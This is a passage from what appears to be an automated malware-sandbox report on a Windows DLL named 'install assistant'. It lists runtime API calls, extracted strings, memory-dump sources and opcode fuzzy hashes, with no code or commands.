                                    • String ID: \j`7$\j`7$j
                                    • API String ID: 0-3644614255
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1C6CE5
                                      • Part of subcall function 6C19CC2A: __EH_prolog.LIBCMT ref: 6C19CC2F
                                      • Part of subcall function 6C19E6A6: __EH_prolog.LIBCMT ref: 6C19E6AB
                                      • Part of subcall function 6C1C6A0E: __EH_prolog.LIBCMT ref: 6C1C6A13
                                      • Part of subcall function 6C1C6837: __EH_prolog.LIBCMT ref: 6C1C683C
                                      • Part of subcall function 6C1CA143: __EH_prolog.LIBCMT ref: 6C1CA148
                                      • Part of subcall function 6C1CA143: ctype.LIBCPMT ref: 6C1CA16C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Similarity
                                    • API ID: H_prolog$ctype
                                    • String ID:
                                    • API String ID: 1039218491-3916222277
                                    APIs
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6C170279
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6C170283
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6C170290
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,?,6C16F235,6C169C49,00000003,00000000,6C169C49,00000000), ref: 6C16F19F
                                    • TerminateProcess.KERNEL32(00000000,?,6C16F235,6C169C49,00000003,00000000,6C169C49,00000000), ref: 6C16F1A6
                                    • ExitProcess.KERNEL32 ref: 6C16F1B8
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: x=J
                                    • API String ID: 3519838083-1497497802
                                    APIs
                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C1678B0
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C1680D3
                                      • Part of subcall function 6C169379: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C1680BC,00000000,?,?,?,6C1680BC,?,6C19554C), ref: 6C1693D9
                                    Similarity
                                    • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                    • String ID:
                                    • API String ID: 915016180-0
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: @4J$DsL
                                    • API String ID: 0-2004129199
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1B540F
                                      • Part of subcall function 6C1B6137: __EH_prolog.LIBCMT ref: 6C1B613C
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    Strings
                                    Similarity
                                    • API ID:
                                    • String ID: YA1
                                    • API String ID: 0-613462611
                                    • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                    • Instruction ID: 5406c9b0b69eb0bb35c79f69315a1a4d52403e1c32c9584bcfcafbb05d7e2a81
                                    • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                    • Instruction Fuzzy Hash: 5A42B27170A3858FC315CF28C49069AFBE2BFD9308F15496EE8D58B742D671D946CB82
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aullrem
                                    • String ID:
                                    • API String ID: 3758378126-0
                                    • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                    • Instruction ID: a1c91ff14be72d0742d6b4c22b841e8159cef527d9970253f87263f7934048c2
                                    • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                    • Instruction Fuzzy Hash: 6751E972A052859BD710CF9AC4C02EDFBE6EF7A214F14C05DE8C897242D27A599BC760
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                    • Instruction ID: f73e5f2a1d45294825c4ba49994f16f38008dfcf00d012dca32709447e6df81e
                                    • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                    • Instruction Fuzzy Hash: 96029A3160C385CBD325CF29C49079EBBE2AFC9318F144A2DEAC597B51C7759949CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (SL
                                    • API String ID: 0-669240678
                                    • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                    • Instruction ID: fd19f14ee3e5b1be47f341cbd9dfc087195c3a00d17d5eef6120d2d6d0311336
                                    • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                    • Instruction Fuzzy Hash: B9519473E208314AD78CCE24DC2177572D2E784310F8BC1B99D8BAB6E6CD78989187D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: xU&l
                                    • API String ID: 0-1650595171
                                    • Opcode ID: 47dbc8a1d4ce8aea1a67dbfaee97188823b8d68967ae3daa558e9d0cb0f138a5
                                    • Instruction ID: 5e507bcaea4c3fdf0ed4b50846616246b380038bca993513646b10a42f3bfc1b
                                    • Opcode Fuzzy Hash: 47dbc8a1d4ce8aea1a67dbfaee97188823b8d68967ae3daa558e9d0cb0f138a5
                                    • Instruction Fuzzy Hash: 89F0E532A10324DBCB22DB4DC505B8973BDEB45B65F1100A6E404DB641C7B0DE40CBE0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                    • Instruction ID: 02e53dea8e0f15ab3fa6f302ac9e64ff0692c37b11aa398619c2386e5dd033e2
                                    • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                    • Instruction Fuzzy Hash: 21524F31608B898BD329CF29C49066AB7E2BF95308F148A2DD9DAC7F41DB74F855CB41
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                    • Instruction ID: d36415c1d0e3d445b69da5770cda916ea60cf9475d911c4d661d15c6bd4bf9de
                                    • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                    • Instruction Fuzzy Hash: 4B62F2B5A08349CFC714CF19C58091ABBE5BFC8745F248A2EF89987B14D778E845CB52
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                    • Instruction ID: 226d468b648c911301f37fc1870539f12d8bab1aa02b4a1d7474301dbe61640e
                                    • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                    • Instruction Fuzzy Hash: 4312907120974A8FC718CF69C49066ABBE2BFC8348F64492DEADA87F41D731E845CB41
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                    • Instruction ID: c6eae4991a9f193befa084d1bda4cca95bd077d000676d32a8fabe1add3f9a85
                                    • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                    • Instruction Fuzzy Hash: 7F021832A083158BD31ACE2CC490269BBF6FBC4355F154B2EFC96D7A94D7789844CB92
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                    • Instruction ID: 110594e27c8a208ecb1cc0ca2949626d348cd894a04cf3aafc80a016c69eb527
                                    • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                    • Instruction Fuzzy Hash: 80F1F1327442898BEB24CE28D8507EEB7E2FBC5314F58453ADC89CBB41DB35954ACB91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                    • Instruction ID: 60ce875ff9715bacd4f4c75510339b7afa9828283a0dcaffe3d9298db80a5190
                                    • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                    • Instruction Fuzzy Hash: 7CD1017150871A8FD319CF1CC4A4636BBE1EF86305F064A7DEAB28BB9AD7349505CB40
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                    • Instruction ID: c40050ed2b29d5661e560d78df70d3f7ee104671e514592a30dcde464c7eb56d
                                    • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                    • Instruction Fuzzy Hash: F3C106752087458BC318CE3DD0A4697BBE2EFDA304F148A6DD9CA8BF55DA30A40ECB55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                    • Instruction ID: 98129ed4d71ae2a494d165bd12775a097104b2f3a39a85ef102fb51307353f60
                                    • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                    • Instruction Fuzzy Hash: 95B1DF31305B094BD324DE39C8907EBB7E1BF85708F04492ED9EA87B91EF34A5498795
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                    • Instruction ID: 57263d1de261bf7bf0c96e8053aec81187f26856401524c7271e4c7e8691bc0a
                                    • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                    • Instruction Fuzzy Hash: 54B1AD756087068BC304DF29C8806ABF7E2FFD8304F14892DE999C7711E771A59ACB96
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                    • Instruction ID: 1d56b90e1515452a7931fef8788716c3be33138a8698892f8adad5c892b33446
                                    • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                    • Instruction Fuzzy Hash: C1A1F77160C3458FC315DF29C49069ABBE1AFD9308F584A2DF9DAC7B40D631EA5ACB42
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                    • Instruction ID: 14b32a64df0bcd293e28692756b75fcc423e153b917f696dc1185f4eb5d2bd23
                                    • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                    • Instruction Fuzzy Hash: B481D335A087068FC320DF29C080246B7E1FF99704F29C96DD9999BB15E772E947CB81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                    • Instruction ID: f06343140c4489a5a1caa14e06fc7aaf9a37595620df41ab59627b2d07d20797
                                    • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                    • Instruction Fuzzy Hash: 72518FB2F006099BDB08CE98DAA16ADB7F1EB98304F248169D515F7781D774AA41CF40
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                    • Instruction ID: 7582cad110a897d6030f60462cc5fc13bb7f5c223c2ed3f38b5ce76433596b6e
                                    • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                    • Instruction Fuzzy Hash: 803114277A440103C70CCE3BCC1679F91535BE466A70ECF79AC05EEF55D52CC8164544
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                    • Instruction ID: 82fd6fe14563b513cba1d6f953ecf1933a648fd62d5db317c0d737cbde87b49c
                                    • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                    • Instruction Fuzzy Hash: 5F219077320A0647E74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C385
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                    • Instruction ID: 586d1611c2944f6ff8ec719a6ba5b5ee99bb7d24fa36e45ac37272567eb03e25
                                    • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                    • Instruction Fuzzy Hash: 10E08C72A12238EBCB25EB88CA00E8AB3ECEB48B45F210096B501D3610D270DE04C7E0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                    • Instruction ID: 0ac7678a75ce2e63ffd32215bc481eafa9b301a584c0df26a37375d5a2789853
                                    • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                                    • Instruction Fuzzy Hash: D9C08CE312810057C702EA2599C0BAAF7A37360330F228C2EA0A2F7E43C328C0648111
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                    • API String ID: 3519838083-609671
                                    • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                    • Instruction ID: b9af47bec1ed35215598a9ddeeb01b926eb6adad92fef66eac0e2c9dc8f7092b
                                    • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                    • Instruction Fuzzy Hash: 81D1D131B04209DFCB11CFA4D991BEEB7B5FF25308F244059F055A3A50DB78AA08CBA2
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv$H_prolog
                                    • String ID: >WJ$x$x
                                    • API String ID: 2300968129-3162267903
                                    • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                    • Instruction ID: 471d2e47f70a81919cf91afa81f08ff5531db91a2ac0d2913c487f313e138e5f
                                    • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                    • Instruction Fuzzy Hash: 5512677190021DEFDF18DFA4C980AEDBBB5BF28318F248169E919BB650CB359945CF50
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 6C169B07
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6C169B0F
                                    • _ValidateLocalCookies.LIBCMT ref: 6C169B98
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6C169BC3
                                    • _ValidateLocalCookies.LIBCMT ref: 6C169C18
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 1e994e09929bb42ddec72a6bea6b23f724bb039f2eb8e3dbb64aca8e7357b0ba
                                    • Instruction ID: b4e9847f7c4103a67ceed1446b383dc70b12d81261803f1734472701bd025b46
                                    • Opcode Fuzzy Hash: 1e994e09929bb42ddec72a6bea6b23f724bb039f2eb8e3dbb64aca8e7357b0ba
                                    • Instruction Fuzzy Hash: AF41CF34A112189BCF00DF6AC8A4B9E7BB5BF46328F248155E8149BF91D735DA25CFA0
                                    Strings
                                    Memory Dump Source
